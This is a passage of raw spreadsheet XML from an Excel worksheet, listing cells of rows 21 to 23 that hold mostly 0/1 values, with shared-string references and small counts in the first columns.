      <c r="PV21">
        <v>0</v>
      </c>
      <c r="PW21">
        <v>0</v>
      </c>
      <c r="PX21">
        <v>0</v>
      </c>
      <c r="PY21">
        <v>0</v>
      </c>
      <c r="PZ21">
        <v>1</v>
      </c>
      <c r="QA21">
        <v>0</v>
      </c>
      <c r="QB21">
        <v>0</v>
      </c>
      <c r="QC21">
        <v>0</v>
      </c>
      <c r="QD21">
        <v>0</v>
      </c>
      <c r="QE21">
        <v>0</v>
      </c>
      <c r="QF21">
        <v>0</v>
      </c>
      <c r="QG21">
        <v>0</v>
      </c>
      <c r="QH21">
        <v>0</v>
      </c>
      <c r="QI21">
        <v>0</v>
      </c>
      <c r="QJ21">
        <v>0</v>
      </c>
      <c r="QK21">
        <v>0</v>
      </c>
      <c r="QL21">
        <v>0</v>
      </c>
      <c r="QM21">
        <v>0</v>
      </c>
      <c r="QN21">
        <v>0</v>
      </c>
      <c r="QO21">
        <v>0</v>
      </c>
      <c r="QP21">
        <v>0</v>
      </c>
      <c r="QQ21">
        <v>0</v>
      </c>
      <c r="QR21">
        <v>0</v>
      </c>
      <c r="QS21">
        <v>0</v>
      </c>
      <c r="QT21">
        <v>0</v>
      </c>
      <c r="QU21">
        <v>0</v>
      </c>
      <c r="QV21">
        <v>0</v>
      </c>
      <c r="QW21">
        <v>0</v>
      </c>
      <c r="QX21">
        <v>0</v>
      </c>
      <c r="QY21">
        <v>0</v>
      </c>
      <c r="QZ21">
        <v>0</v>
      </c>
      <c r="RA21">
        <v>0</v>
      </c>
      <c r="RB21">
        <v>0</v>
      </c>
      <c r="RC21">
        <v>0</v>
      </c>
      <c r="RD21">
        <v>0</v>
      </c>
      <c r="RE21">
        <v>0</v>
      </c>
      <c r="RF21">
        <v>0</v>
      </c>
      <c r="RG21">
        <v>0</v>
      </c>
      <c r="RH21">
        <v>0</v>
      </c>
      <c r="RI21">
        <v>0</v>
      </c>
      <c r="RJ21">
        <v>0</v>
      </c>
      <c r="RK21">
        <v>0</v>
      </c>
      <c r="RL21">
        <v>0</v>
      </c>
      <c r="RM21">
        <v>0</v>
      </c>
      <c r="RN21">
        <v>0</v>
      </c>
      <c r="RO21">
        <v>0</v>
      </c>
      <c r="RP21">
        <v>0</v>
      </c>
      <c r="RQ21">
        <v>0</v>
      </c>
      <c r="RR21">
        <v>1</v>
      </c>
      <c r="RS21">
        <v>0</v>
      </c>
      <c r="RT21">
        <v>0</v>
      </c>
      <c r="RU21">
        <v>0</v>
      </c>
      <c r="RV21">
        <v>0</v>
      </c>
      <c r="RW21">
        <v>0</v>
      </c>
      <c r="RX21">
        <v>0</v>
      </c>
      <c r="RY21">
        <v>0</v>
      </c>
      <c r="RZ21">
        <v>0</v>
      </c>
      <c r="SA21">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A22" s="6" t="s">
        <v>2665</v>
      </c>
      <c r="B22">
        <v>30</v>
      </c>
      <c r="C22">
        <v>0</v>
      </c>
      <c r="D22">
        <v>0</v>
      </c>
      <c r="E22">
        <v>0</v>
      </c>
      <c r="F22">
        <v>1</v>
      </c>
      <c r="G22">
        <v>0</v>
      </c>
      <c r="H22">
        <v>0</v>
      </c>
      <c r="I22">
        <v>1</v>
      </c>
      <c r="J22">
        <v>0</v>
      </c>
      <c r="K22">
        <v>0</v>
      </c>
      <c r="L22">
        <v>0</v>
      </c>
      <c r="M22">
        <v>1</v>
      </c>
      <c r="N22">
        <v>0</v>
      </c>
      <c r="O22">
        <v>0</v>
      </c>
      <c r="P22">
        <v>0</v>
      </c>
      <c r="Q22">
        <v>0</v>
      </c>
      <c r="R22">
        <v>0</v>
      </c>
      <c r="S22">
        <v>0</v>
      </c>
      <c r="T22">
        <v>0</v>
      </c>
      <c r="U22">
        <v>0</v>
      </c>
      <c r="V22">
        <v>0</v>
      </c>
      <c r="W22">
        <v>0</v>
      </c>
      <c r="X22">
        <v>0</v>
      </c>
      <c r="Y22">
        <v>0</v>
      </c>
      <c r="Z22">
        <v>0</v>
      </c>
      <c r="AA22">
        <v>0</v>
      </c>
      <c r="AB22">
        <v>0</v>
      </c>
      <c r="AC22">
        <v>0</v>
      </c>
      <c r="AD22">
        <v>0</v>
      </c>
      <c r="AE22">
        <v>0</v>
      </c>
      <c r="AF22">
        <v>0</v>
      </c>
      <c r="AG22">
        <v>0</v>
      </c>
      <c r="AH22">
        <v>0</v>
      </c>
      <c r="AI22">
        <v>0</v>
      </c>
      <c r="AJ22">
        <v>0</v>
      </c>
      <c r="AK22">
        <v>1</v>
      </c>
      <c r="AL22">
        <v>0</v>
      </c>
      <c r="AM22">
        <v>0</v>
      </c>
      <c r="AN22">
        <v>0</v>
      </c>
      <c r="AO22">
        <v>0</v>
      </c>
      <c r="AP22">
        <v>0</v>
      </c>
      <c r="AQ22">
        <v>0</v>
      </c>
      <c r="AR22">
        <v>0</v>
      </c>
      <c r="AS22">
        <v>0</v>
      </c>
      <c r="AT22">
        <v>0</v>
      </c>
      <c r="AU22">
        <v>1</v>
      </c>
      <c r="AV22">
        <v>0</v>
      </c>
      <c r="AW22">
        <v>0</v>
      </c>
      <c r="AX22">
        <v>0</v>
      </c>
      <c r="AY22">
        <v>0</v>
      </c>
      <c r="AZ22">
        <v>0</v>
      </c>
      <c r="BA22">
        <v>0</v>
      </c>
      <c r="BB22">
        <v>0</v>
      </c>
      <c r="BC22">
        <v>0</v>
      </c>
      <c r="BD22">
        <v>0</v>
      </c>
      <c r="BE22">
        <v>0</v>
      </c>
      <c r="BF22">
        <v>0</v>
      </c>
      <c r="BG22">
        <v>0</v>
      </c>
      <c r="BH22">
        <v>0</v>
      </c>
      <c r="BI22">
        <v>1</v>
      </c>
      <c r="BJ22">
        <v>0</v>
      </c>
      <c r="BK22">
        <v>0</v>
      </c>
      <c r="BL22">
        <v>0</v>
      </c>
      <c r="BM22">
        <v>0</v>
      </c>
      <c r="BN22">
        <v>0</v>
      </c>
      <c r="BO22">
        <v>0</v>
      </c>
      <c r="BP22">
        <v>0</v>
      </c>
      <c r="BQ22">
        <v>0</v>
      </c>
      <c r="BR22">
        <v>0</v>
      </c>
      <c r="BS22">
        <v>0</v>
      </c>
      <c r="BT22">
        <v>0</v>
      </c>
      <c r="BU22">
        <v>0</v>
      </c>
      <c r="BV22">
        <v>0</v>
      </c>
      <c r="BW22">
        <v>0</v>
      </c>
      <c r="BX22">
        <v>0</v>
      </c>
      <c r="BY22">
        <v>0</v>
      </c>
      <c r="BZ22">
        <v>0</v>
      </c>
      <c r="CA22">
        <v>0</v>
      </c>
      <c r="CB22">
        <v>0</v>
      </c>
      <c r="CC22">
        <v>0</v>
      </c>
      <c r="CD22">
        <v>0</v>
      </c>
      <c r="CE22">
        <v>0</v>
      </c>
      <c r="CF22">
        <v>0</v>
      </c>
      <c r="CG22">
        <v>0</v>
      </c>
      <c r="CH22">
        <v>0</v>
      </c>
      <c r="CI22">
        <v>0</v>
      </c>
      <c r="CJ22">
        <v>0</v>
      </c>
      <c r="CK22">
        <v>0</v>
      </c>
      <c r="CL22">
        <v>0</v>
      </c>
      <c r="CM22">
        <v>0</v>
      </c>
      <c r="CN22">
        <v>0</v>
      </c>
      <c r="CO22">
        <v>0</v>
      </c>
      <c r="CP22">
        <v>0</v>
      </c>
      <c r="CQ22">
        <v>1</v>
      </c>
      <c r="CR22">
        <v>0</v>
      </c>
      <c r="CS22">
        <v>0</v>
      </c>
      <c r="CT22">
        <v>0</v>
      </c>
      <c r="CU22">
        <v>0</v>
      </c>
      <c r="CV22">
        <v>0</v>
      </c>
      <c r="CW22">
        <v>0</v>
      </c>
      <c r="CX22">
        <v>0</v>
      </c>
      <c r="CY22">
        <v>0</v>
      </c>
      <c r="CZ22">
        <v>0</v>
      </c>
      <c r="DA22">
        <v>0</v>
      </c>
      <c r="DB22">
        <v>0</v>
      </c>
      <c r="DC22">
        <v>1</v>
      </c>
      <c r="DD22">
        <v>0</v>
      </c>
      <c r="DE22">
        <v>0</v>
      </c>
      <c r="DF22">
        <v>0</v>
      </c>
      <c r="DG22">
        <v>0</v>
      </c>
      <c r="DH22">
        <v>0</v>
      </c>
      <c r="DI22">
        <v>0</v>
      </c>
      <c r="DJ22">
        <v>0</v>
      </c>
      <c r="DK22">
        <v>0</v>
      </c>
      <c r="DL22">
        <v>0</v>
      </c>
      <c r="DM22">
        <v>0</v>
      </c>
      <c r="DN22">
        <v>1</v>
      </c>
      <c r="DO22">
        <v>1</v>
      </c>
      <c r="DP22">
        <v>1</v>
      </c>
      <c r="DQ22">
        <v>0</v>
      </c>
      <c r="DR22">
        <v>0</v>
      </c>
      <c r="DS22">
        <v>0</v>
      </c>
      <c r="DT22">
        <v>1</v>
      </c>
      <c r="DU22">
        <v>0</v>
      </c>
      <c r="DV22">
        <v>0</v>
      </c>
      <c r="DW22">
        <v>0</v>
      </c>
      <c r="DX22">
        <v>1</v>
      </c>
      <c r="DY22">
        <v>0</v>
      </c>
      <c r="DZ22">
        <v>0</v>
      </c>
      <c r="EA22">
        <v>0</v>
      </c>
      <c r="EB22">
        <v>0</v>
      </c>
      <c r="EC22">
        <v>0</v>
      </c>
      <c r="ED22">
        <v>0</v>
      </c>
      <c r="EE22">
        <v>0</v>
      </c>
      <c r="EF22">
        <v>0</v>
      </c>
      <c r="EG22">
        <v>0</v>
      </c>
      <c r="EH22">
        <v>0</v>
      </c>
      <c r="EI22">
        <v>0</v>
      </c>
      <c r="EJ22">
        <v>0</v>
      </c>
      <c r="EK22">
        <v>0</v>
      </c>
      <c r="EL22">
        <v>0</v>
      </c>
      <c r="EM22">
        <v>0</v>
      </c>
      <c r="EN22">
        <v>0</v>
      </c>
      <c r="EO22">
        <v>0</v>
      </c>
      <c r="EP22">
        <v>0</v>
      </c>
      <c r="EQ22">
        <v>0</v>
      </c>
      <c r="ER22">
        <v>0</v>
      </c>
      <c r="ES22">
        <v>0</v>
      </c>
      <c r="ET22">
        <v>1</v>
      </c>
      <c r="EU22">
        <v>0</v>
      </c>
      <c r="EV22">
        <v>0</v>
      </c>
      <c r="EW22">
        <v>0</v>
      </c>
      <c r="EX22">
        <v>0</v>
      </c>
      <c r="EY22">
        <v>0</v>
      </c>
      <c r="EZ22">
        <v>0</v>
      </c>
      <c r="FA22">
        <v>0</v>
      </c>
      <c r="FB22">
        <v>0</v>
      </c>
      <c r="FC22">
        <v>0</v>
      </c>
      <c r="FD22">
        <v>0</v>
      </c>
      <c r="FE22">
        <v>0</v>
      </c>
      <c r="FF22">
        <v>0</v>
      </c>
      <c r="FG22">
        <v>0</v>
      </c>
      <c r="FH22">
        <v>0</v>
      </c>
      <c r="FI22">
        <v>0</v>
      </c>
      <c r="FJ22">
        <v>0</v>
      </c>
      <c r="FK22">
        <v>0</v>
      </c>
      <c r="FL22">
        <v>0</v>
      </c>
      <c r="FM22">
        <v>0</v>
      </c>
      <c r="FN22">
        <v>0</v>
      </c>
      <c r="FO22">
        <v>0</v>
      </c>
      <c r="FP22">
        <v>0</v>
      </c>
      <c r="FQ22">
        <v>0</v>
      </c>
      <c r="FR22">
        <v>0</v>
      </c>
      <c r="FS22">
        <v>0</v>
      </c>
      <c r="FT22">
        <v>0</v>
      </c>
      <c r="FU22">
        <v>0</v>
      </c>
      <c r="FV22">
        <v>0</v>
      </c>
      <c r="FW22">
        <v>0</v>
      </c>
      <c r="FX22">
        <v>0</v>
      </c>
      <c r="FY22">
        <v>0</v>
      </c>
      <c r="FZ22">
        <v>0</v>
      </c>
      <c r="GA22">
        <v>0</v>
      </c>
      <c r="GB22">
        <v>0</v>
      </c>
      <c r="GC22">
        <v>0</v>
      </c>
      <c r="GD22">
        <v>0</v>
      </c>
      <c r="GE22">
        <v>0</v>
      </c>
      <c r="GF22">
        <v>0</v>
      </c>
      <c r="GG22">
        <v>0</v>
      </c>
      <c r="GH22">
        <v>0</v>
      </c>
      <c r="GI22">
        <v>0</v>
      </c>
      <c r="GJ22">
        <v>0</v>
      </c>
      <c r="GK22">
        <v>0</v>
      </c>
      <c r="GL22">
        <v>0</v>
      </c>
      <c r="GM22">
        <v>0</v>
      </c>
      <c r="GN22">
        <v>0</v>
      </c>
      <c r="GO22">
        <v>0</v>
      </c>
      <c r="GP22">
        <v>0</v>
      </c>
      <c r="GQ22">
        <v>0</v>
      </c>
      <c r="GR22">
        <v>0</v>
      </c>
      <c r="GS22">
        <v>0</v>
      </c>
      <c r="GT22">
        <v>0</v>
      </c>
      <c r="GU22">
        <v>0</v>
      </c>
      <c r="GV22">
        <v>0</v>
      </c>
      <c r="GW22">
        <v>1</v>
      </c>
      <c r="GX22">
        <v>0</v>
      </c>
      <c r="GY22">
        <v>0</v>
      </c>
      <c r="GZ22">
        <v>0</v>
      </c>
      <c r="HA22">
        <v>0</v>
      </c>
      <c r="HB22">
        <v>0</v>
      </c>
      <c r="HC22">
        <v>0</v>
      </c>
      <c r="HD22">
        <v>0</v>
      </c>
      <c r="HE22">
        <v>0</v>
      </c>
      <c r="HF22">
        <v>0</v>
      </c>
      <c r="HG22">
        <v>1</v>
      </c>
      <c r="HH22">
        <v>0</v>
      </c>
      <c r="HI22">
        <v>0</v>
      </c>
      <c r="HJ22">
        <v>0</v>
      </c>
      <c r="HK22">
        <v>0</v>
      </c>
      <c r="HL22">
        <v>0</v>
      </c>
      <c r="HM22">
        <v>0</v>
      </c>
      <c r="HN22">
        <v>0</v>
      </c>
      <c r="HO22">
        <v>0</v>
      </c>
      <c r="HP22">
        <v>0</v>
      </c>
      <c r="HQ22">
        <v>1</v>
      </c>
      <c r="HR22">
        <v>0</v>
      </c>
      <c r="HS22">
        <v>0</v>
      </c>
      <c r="HT22">
        <v>0</v>
      </c>
      <c r="HU22">
        <v>0</v>
      </c>
      <c r="HV22">
        <v>1</v>
      </c>
      <c r="HW22">
        <v>0</v>
      </c>
      <c r="HX22">
        <v>0</v>
      </c>
      <c r="HY22">
        <v>0</v>
      </c>
      <c r="HZ22">
        <v>0</v>
      </c>
      <c r="IA22">
        <v>0</v>
      </c>
      <c r="IB22">
        <v>0</v>
      </c>
      <c r="IC22">
        <v>0</v>
      </c>
      <c r="ID22">
        <v>0</v>
      </c>
      <c r="IE22">
        <v>0</v>
      </c>
      <c r="IF22">
        <v>0</v>
      </c>
      <c r="IG22">
        <v>0</v>
      </c>
      <c r="IH22">
        <v>0</v>
      </c>
      <c r="II22">
        <v>0</v>
      </c>
      <c r="IJ22">
        <v>0</v>
      </c>
      <c r="IK22">
        <v>0</v>
      </c>
      <c r="IL22">
        <v>0</v>
      </c>
      <c r="IM22">
        <v>0</v>
      </c>
      <c r="IN22">
        <v>0</v>
      </c>
      <c r="IO22">
        <v>0</v>
      </c>
      <c r="IP22">
        <v>0</v>
      </c>
      <c r="IQ22">
        <v>0</v>
      </c>
      <c r="IR22">
        <v>0</v>
      </c>
      <c r="IS22">
        <v>0</v>
      </c>
      <c r="IT22">
        <v>0</v>
      </c>
      <c r="IU22">
        <v>1</v>
      </c>
      <c r="IV22">
        <v>0</v>
      </c>
      <c r="IW22">
        <v>0</v>
      </c>
      <c r="IX22">
        <v>0</v>
      </c>
      <c r="IY22">
        <v>0</v>
      </c>
      <c r="IZ22">
        <v>0</v>
      </c>
      <c r="JA22">
        <v>0</v>
      </c>
      <c r="JB22">
        <v>0</v>
      </c>
      <c r="JC22">
        <v>0</v>
      </c>
      <c r="JD22">
        <v>0</v>
      </c>
      <c r="JE22">
        <v>0</v>
      </c>
      <c r="JF22">
        <v>0</v>
      </c>
      <c r="JG22">
        <v>0</v>
      </c>
      <c r="JH22">
        <v>0</v>
      </c>
      <c r="JI22">
        <v>0</v>
      </c>
      <c r="JJ22">
        <v>0</v>
      </c>
      <c r="JK22">
        <v>0</v>
      </c>
      <c r="JL22">
        <v>0</v>
      </c>
      <c r="JM22">
        <v>1</v>
      </c>
      <c r="JN22">
        <v>0</v>
      </c>
      <c r="JO22">
        <v>0</v>
      </c>
      <c r="JP22">
        <v>0</v>
      </c>
      <c r="JQ22">
        <v>0</v>
      </c>
      <c r="JR22">
        <v>0</v>
      </c>
      <c r="JS22">
        <v>0</v>
      </c>
      <c r="JT22">
        <v>0</v>
      </c>
      <c r="JU22">
        <v>0</v>
      </c>
      <c r="JV22">
        <v>0</v>
      </c>
      <c r="JW22">
        <v>0</v>
      </c>
      <c r="JX22">
        <v>0</v>
      </c>
      <c r="JY22">
        <v>0</v>
      </c>
      <c r="JZ22">
        <v>0</v>
      </c>
      <c r="KA22">
        <v>0</v>
      </c>
      <c r="KB22">
        <v>0</v>
      </c>
      <c r="KC22">
        <v>0</v>
      </c>
      <c r="KD22">
        <v>0</v>
      </c>
      <c r="KE22">
        <v>0</v>
      </c>
      <c r="KF22">
        <v>0</v>
      </c>
      <c r="KG22">
        <v>0</v>
      </c>
      <c r="KH22">
        <v>0</v>
      </c>
      <c r="KI22">
        <v>0</v>
      </c>
      <c r="KJ22">
        <v>0</v>
      </c>
      <c r="KK22">
        <v>0</v>
      </c>
      <c r="KL22">
        <v>0</v>
      </c>
      <c r="KM22">
        <v>0</v>
      </c>
      <c r="KN22">
        <v>1</v>
      </c>
      <c r="KO22">
        <v>0</v>
      </c>
      <c r="KP22">
        <v>0</v>
      </c>
      <c r="KQ22">
        <v>0</v>
      </c>
      <c r="KR22">
        <v>0</v>
      </c>
      <c r="KS22">
        <v>0</v>
      </c>
      <c r="KT22">
        <v>0</v>
      </c>
      <c r="KU22">
        <v>0</v>
      </c>
      <c r="KV22">
        <v>0</v>
      </c>
      <c r="KW22">
        <v>0</v>
      </c>
      <c r="KX22">
        <v>0</v>
      </c>
      <c r="KY22">
        <v>0</v>
      </c>
      <c r="KZ22">
        <v>0</v>
      </c>
      <c r="LA22">
        <v>0</v>
      </c>
      <c r="LB22">
        <v>0</v>
      </c>
      <c r="LC22">
        <v>0</v>
      </c>
      <c r="LD22">
        <v>1</v>
      </c>
      <c r="LE22">
        <v>1</v>
      </c>
      <c r="LF22">
        <v>0</v>
      </c>
      <c r="LG22">
        <v>0</v>
      </c>
      <c r="LH22">
        <v>0</v>
      </c>
      <c r="LI22">
        <v>0</v>
      </c>
      <c r="LJ22">
        <v>0</v>
      </c>
      <c r="LK22">
        <v>0</v>
      </c>
      <c r="LL22">
        <v>0</v>
      </c>
      <c r="LM22">
        <v>0</v>
      </c>
      <c r="LN22">
        <v>0</v>
      </c>
      <c r="LO22">
        <v>0</v>
      </c>
      <c r="LP22">
        <v>0</v>
      </c>
      <c r="LQ22">
        <v>0</v>
      </c>
      <c r="LR22">
        <v>0</v>
      </c>
      <c r="LS22">
        <v>0</v>
      </c>
      <c r="LT22">
        <v>0</v>
      </c>
      <c r="LU22">
        <v>0</v>
      </c>
      <c r="LV22">
        <v>0</v>
      </c>
      <c r="LW22">
        <v>0</v>
      </c>
      <c r="LX22">
        <v>0</v>
      </c>
      <c r="LY22">
        <v>0</v>
      </c>
      <c r="LZ22">
        <v>0</v>
      </c>
      <c r="MA22">
        <v>0</v>
      </c>
      <c r="MB22">
        <v>0</v>
      </c>
      <c r="MC22">
        <v>0</v>
      </c>
      <c r="MD22">
        <v>0</v>
      </c>
      <c r="ME22">
        <v>0</v>
      </c>
      <c r="MF22">
        <v>0</v>
      </c>
      <c r="MG22">
        <v>0</v>
      </c>
      <c r="MH22">
        <v>0</v>
      </c>
      <c r="MI22">
        <v>1</v>
      </c>
      <c r="MJ22">
        <v>0</v>
      </c>
      <c r="MK22">
        <v>0</v>
      </c>
      <c r="ML22">
        <v>0</v>
      </c>
      <c r="MM22">
        <v>0</v>
      </c>
      <c r="MN22">
        <v>0</v>
      </c>
      <c r="MO22">
        <v>0</v>
      </c>
      <c r="MP22">
        <v>0</v>
      </c>
      <c r="MQ22">
        <v>0</v>
      </c>
      <c r="MR22">
        <v>0</v>
      </c>
      <c r="MS22">
        <v>0</v>
      </c>
      <c r="MT22">
        <v>0</v>
      </c>
      <c r="MU22">
        <v>1</v>
      </c>
      <c r="MV22">
        <v>0</v>
      </c>
      <c r="MW22">
        <v>0</v>
      </c>
      <c r="MX22">
        <v>0</v>
      </c>
      <c r="MY22">
        <v>0</v>
      </c>
      <c r="MZ22">
        <v>0</v>
      </c>
      <c r="NA22">
        <v>0</v>
      </c>
      <c r="NB22">
        <v>0</v>
      </c>
      <c r="NC22">
        <v>0</v>
      </c>
      <c r="ND22">
        <v>0</v>
      </c>
      <c r="NE22">
        <v>0</v>
      </c>
      <c r="NF22">
        <v>0</v>
      </c>
      <c r="NG22">
        <v>0</v>
      </c>
      <c r="NH22">
        <v>0</v>
      </c>
      <c r="NI22">
        <v>0</v>
      </c>
      <c r="NJ22">
        <v>0</v>
      </c>
      <c r="NK22">
        <v>0</v>
      </c>
      <c r="NL22">
        <v>0</v>
      </c>
      <c r="NM22">
        <v>0</v>
      </c>
      <c r="NN22">
        <v>0</v>
      </c>
      <c r="NO22">
        <v>0</v>
      </c>
      <c r="NP22">
        <v>0</v>
      </c>
      <c r="NQ22">
        <v>0</v>
      </c>
      <c r="NR22">
        <v>0</v>
      </c>
      <c r="NS22">
        <v>0</v>
      </c>
      <c r="NT22">
        <v>0</v>
      </c>
      <c r="NU22">
        <v>0</v>
      </c>
      <c r="NV22">
        <v>0</v>
      </c>
      <c r="NW22">
        <v>0</v>
      </c>
      <c r="NX22">
        <v>0</v>
      </c>
      <c r="NY22">
        <v>1</v>
      </c>
      <c r="NZ22">
        <v>0</v>
      </c>
      <c r="OA22">
        <v>0</v>
      </c>
      <c r="OB22">
        <v>0</v>
      </c>
      <c r="OC22">
        <v>0</v>
      </c>
      <c r="OD22">
        <v>0</v>
      </c>
      <c r="OE22">
        <v>0</v>
      </c>
      <c r="OF22">
        <v>0</v>
      </c>
      <c r="OG22">
        <v>0</v>
      </c>
      <c r="OH22">
        <v>0</v>
      </c>
      <c r="OI22">
        <v>0</v>
      </c>
      <c r="OJ22">
        <v>0</v>
      </c>
      <c r="OK22">
        <v>0</v>
      </c>
      <c r="OL22">
        <v>0</v>
      </c>
      <c r="OM22">
        <v>0</v>
      </c>
      <c r="ON22">
        <v>0</v>
      </c>
      <c r="OO22">
        <v>0</v>
      </c>
      <c r="OP22">
        <v>0</v>
      </c>
      <c r="OQ22">
        <v>0</v>
      </c>
      <c r="OR22">
        <v>1</v>
      </c>
      <c r="OS22">
        <v>0</v>
      </c>
      <c r="OT22">
        <v>0</v>
      </c>
      <c r="OU22">
        <v>0</v>
      </c>
      <c r="OV22">
        <v>0</v>
      </c>
      <c r="OW22">
        <v>0</v>
      </c>
      <c r="OX22">
        <v>0</v>
      </c>
      <c r="OY22">
        <v>0</v>
      </c>
      <c r="OZ22">
        <v>0</v>
      </c>
      <c r="PA22">
        <v>0</v>
      </c>
      <c r="PB22">
        <v>0</v>
      </c>
      <c r="PC22">
        <v>0</v>
      </c>
      <c r="PD22">
        <v>0</v>
      </c>
      <c r="PE22">
        <v>0</v>
      </c>
      <c r="PF22">
        <v>0</v>
      </c>
      <c r="PG22">
        <v>0</v>
      </c>
      <c r="PH22">
        <v>0</v>
      </c>
      <c r="PI22">
        <v>0</v>
      </c>
      <c r="PJ22">
        <v>0</v>
      </c>
      <c r="PK22">
        <v>0</v>
      </c>
      <c r="PL22">
        <v>0</v>
      </c>
      <c r="PM22">
        <v>0</v>
      </c>
      <c r="PN22">
        <v>0</v>
      </c>
      <c r="PO22">
        <v>0</v>
      </c>
      <c r="PP22">
        <v>0</v>
      </c>
      <c r="PQ22">
        <v>0</v>
      </c>
      <c r="PR22">
        <v>0</v>
      </c>
      <c r="PS22">
        <v>0</v>
      </c>
      <c r="PT22">
        <v>1</v>
      </c>
      <c r="PU22">
        <v>0</v>
      </c>
      <c r="PV22">
        <v>0</v>
      </c>
      <c r="PW22">
        <v>0</v>
      </c>
      <c r="PX22">
        <v>0</v>
      </c>
      <c r="PY22">
        <v>0</v>
      </c>
      <c r="PZ22">
        <v>0</v>
      </c>
      <c r="QA22">
        <v>0</v>
      </c>
      <c r="QB22">
        <v>0</v>
      </c>
      <c r="QC22">
        <v>1</v>
      </c>
      <c r="QD22">
        <v>0</v>
      </c>
      <c r="QE22">
        <v>0</v>
      </c>
      <c r="QF22">
        <v>0</v>
      </c>
      <c r="QG22">
        <v>0</v>
      </c>
      <c r="QH22">
        <v>0</v>
      </c>
      <c r="QI22">
        <v>0</v>
      </c>
      <c r="QJ22">
        <v>0</v>
      </c>
      <c r="QK22">
        <v>0</v>
      </c>
      <c r="QL22">
        <v>0</v>
      </c>
      <c r="QM22">
        <v>0</v>
      </c>
      <c r="QN22">
        <v>0</v>
      </c>
      <c r="QO22">
        <v>0</v>
      </c>
      <c r="QP22">
        <v>0</v>
      </c>
      <c r="QQ22">
        <v>0</v>
      </c>
      <c r="QR22">
        <v>0</v>
      </c>
      <c r="QS22">
        <v>1</v>
      </c>
      <c r="QT22">
        <v>0</v>
      </c>
      <c r="QU22">
        <v>0</v>
      </c>
      <c r="QV22">
        <v>0</v>
      </c>
      <c r="QW22">
        <v>0</v>
      </c>
      <c r="QX22">
        <v>0</v>
      </c>
      <c r="QY22">
        <v>0</v>
      </c>
      <c r="QZ22">
        <v>0</v>
      </c>
      <c r="RA22">
        <v>0</v>
      </c>
      <c r="RB22">
        <v>0</v>
      </c>
      <c r="RC22">
        <v>0</v>
      </c>
      <c r="RD22">
        <v>0</v>
      </c>
      <c r="RE22">
        <v>0</v>
      </c>
      <c r="RF22">
        <v>0</v>
      </c>
      <c r="RG22">
        <v>0</v>
      </c>
      <c r="RH22">
        <v>0</v>
      </c>
      <c r="RI22">
        <v>0</v>
      </c>
      <c r="RJ22">
        <v>0</v>
      </c>
      <c r="RK22">
        <v>0</v>
      </c>
      <c r="RL22">
        <v>0</v>
      </c>
      <c r="RM22">
        <v>0</v>
      </c>
      <c r="RN22">
        <v>0</v>
      </c>
      <c r="RO22">
        <v>0</v>
      </c>
      <c r="RP22">
        <v>0</v>
      </c>
      <c r="RQ22">
        <v>0</v>
      </c>
      <c r="RR22">
        <v>0</v>
      </c>
      <c r="RS22">
        <v>0</v>
      </c>
      <c r="RT22">
        <v>0</v>
      </c>
      <c r="RU22">
        <v>0</v>
      </c>
      <c r="RV22">
        <v>0</v>
      </c>
      <c r="RW22">
        <v>0</v>
      </c>
      <c r="RX22">
        <v>0</v>
      </c>
      <c r="RY22">
        <v>0</v>
      </c>
      <c r="RZ22">
        <v>0</v>
      </c>
      <c r="SA22">
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A23" s="6" t="s">
        <v>2673</v>
      </c>
      <c r="B23">
        <v>22</v>
      </c>
      <c r="C23">
        <v>0</v>
      </c>
      <c r="D23">
        <v>0</v>
      </c>
      <c r="E23">
        <v>0</v>
      </c>
      <c r="F23">
        <v>1</v>
      </c>
      <c r="G23">
        <v>0</v>
      </c>
      <c r="H23">
        <v>0</v>
      </c>
      <c r="I23">
        <v>0</v>
      </c>
      <c r="J23">
        <v>1</v>
      </c>
      <c r="K23">
        <v>0</v>
      </c>
      <c r="L23">
        <v>0</v>
      </c>
      <c r="M23">
        <v>0</v>
      </c>
      <c r="N23">
        <v>0</v>
      </c>
      <c r="O23">
        <v>0</v>
      </c>
      <c r="P23">
        <v>1</v>
      </c>
      <c r="Q23">
        <v>0</v>
      </c>
      <c r="R23">
        <v>0</v>
      </c>
      <c r="S23">
        <v>0</v>
      </c>
      <c r="T23">
        <v>0</v>
      </c>
      <c r="U23">
        <v>0</v>
      </c>
      <c r="V23">
        <v>0</v>
      </c>
      <c r="W23">
        <v>0</v>
      </c>
      <c r="X23">
        <v>0</v>
      </c>
      <c r="Y23">
        <v>0</v>
      </c>
      <c r="Z23">
        <v>0</v>
      </c>
      <c r="AA23">
        <v>0</v>
      </c>
      <c r="AB23">
        <v>0</v>
      </c>
      <c r="AC23">
        <v>0</v>
      </c>
      <c r="AD23">
        <v>0</v>
      </c>
      <c r="AE23">
        <v>0</v>
      </c>
      <c r="AF23">
        <v>0</v>
      </c>
      <c r="AG23">
        <v>0</v>
      </c>
      <c r="AH23">
        <v>0</v>
      </c>
      <c r="AI23">
        <v>0</v>
      </c>
      <c r="AJ23">
        <v>0</v>
      </c>
      <c r="AK23">
        <v>0</v>
      </c>
      <c r="AL23">
        <v>0</v>
      </c>
      <c r="AM23">
        <v>0</v>
      </c>
      <c r="AN23">
        <v>0</v>
      </c>
      <c r="AO23">
        <v>0</v>
      </c>
      <c r="AP23">
        <v>0</v>
      </c>
      <c r="AQ23">
        <v>0</v>
      </c>
      <c r="AR23">
        <v>0</v>
      </c>
      <c r="AS23">
        <v>0</v>
      </c>
      <c r="AT23">
        <v>0</v>
      </c>
      <c r="AU23">
        <v>0</v>
      </c>
      <c r="AV23">
        <v>0</v>
      </c>
      <c r="AW23">
        <v>0</v>
      </c>
      <c r="AX23">
        <v>0</v>
      </c>
      <c r="AY23">
        <v>0</v>
      </c>
      <c r="AZ23">
        <v>0</v>
      </c>
      <c r="BA23">
        <v>0</v>
      </c>
      <c r="BB23">
        <v>0</v>
      </c>
      <c r="BC23">
        <v>0</v>
      </c>
      <c r="BD23">
        <v>0</v>
      </c>
      <c r="BE23">
        <v>0</v>
      </c>
      <c r="BF23">
        <v>0</v>
      </c>
      <c r="BG23">
        <v>0</v>
      </c>
      <c r="BH23">
        <v>0</v>
      </c>
      <c r="BI23">
        <v>0</v>
      </c>
      <c r="BJ23">
        <v>0</v>
      </c>
      <c r="BK23">
        <v>0</v>
      </c>
      <c r="BL23">
        <v>0</v>
      </c>
      <c r="BM23">
        <v>0</v>
      </c>
      <c r="BN23">
        <v>0</v>
      </c>
      <c r="BO23">
        <v>0</v>
      </c>
      <c r="BP23">
